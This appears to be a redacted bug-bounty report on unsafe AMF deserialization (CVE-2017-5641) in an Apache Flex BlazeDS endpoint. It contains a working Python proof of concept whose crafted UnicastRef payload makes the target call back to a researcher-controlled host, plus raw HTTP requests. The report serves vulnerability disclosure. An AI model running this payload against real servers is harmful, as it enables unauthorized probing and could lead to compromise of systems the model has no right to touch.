[HTAF4-213] [Pre-submission] Unsafe AMF deserialization (CVE-2017-5641) in Apache Flex BlazeDS at the https://www.███████/daip/messagebroker/amf

##Description We identified potential unsafe deserialization vulnerability on the `https://www.█████/daip/messagebroker/amf` endpoint. ##POC To exclude false-positive reaction and show that pingback is result of AMF deserialization, and not a reaction to the external host in the POST body, first run this request: ``` POST /daip/messagebroker/amf HTTP/1.1 Host: www.███████ Connection: close Accept-Encoding: gzip, deflate Accept: */* User-Agent: python-requests/2.22.0 Content-Type: application/x-amf Content-Length: 51 <your collaborator host> ``` Nothing will happen. You will receive something like this: ███ You can wait few minutes to ensure that nothing is coming. Next, send the collaborator host inside the serialized AMF payload using this script, e.g. `script.py <collaborator> 80` ``` import struct import sys import requests if len(sys.argv) != 3: print "Usage: host port" quit() callback_IP = sys.argv[1] callback_port = sys.argv[2] amf_payload = '\x00\x03\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\x11\x0a' + \ '\x07\x33' + 'sun.rmi.server.UnicastRef' + struct.pack('>H', len(callback_IP)) + callback_IP + \ struct.pack('>I', int(callback_port)) + \ '\xf9\x6a\x76\x7b\x7c\xde\x68\x4f\x76\xd8\xaa\x3d\x00\x00\x01\x5b\xb0\x4c\x1d\x81\x80\x01\x00'; url = "https://www.███████/daip/messagebroker/amf" headers = {'Content-Type': 'application/x-amf'} response = requests.post(url, headers=headers, data=amf_payload, verify=False) ``` This will result in the significant delay, and soon you will get the pingback from the ███/███ IP This indicates, that backend server deserialized AMF data and triggered a DNS lookup (there won't be http since `sun.rmi.server.UnicastRef` doesn't communicate via http). ##Suggested fix Update Apache Flex BlazeDS library ## Impact Unsafe deserialization of AMF data. We will work on this and try to improve impact, if possible.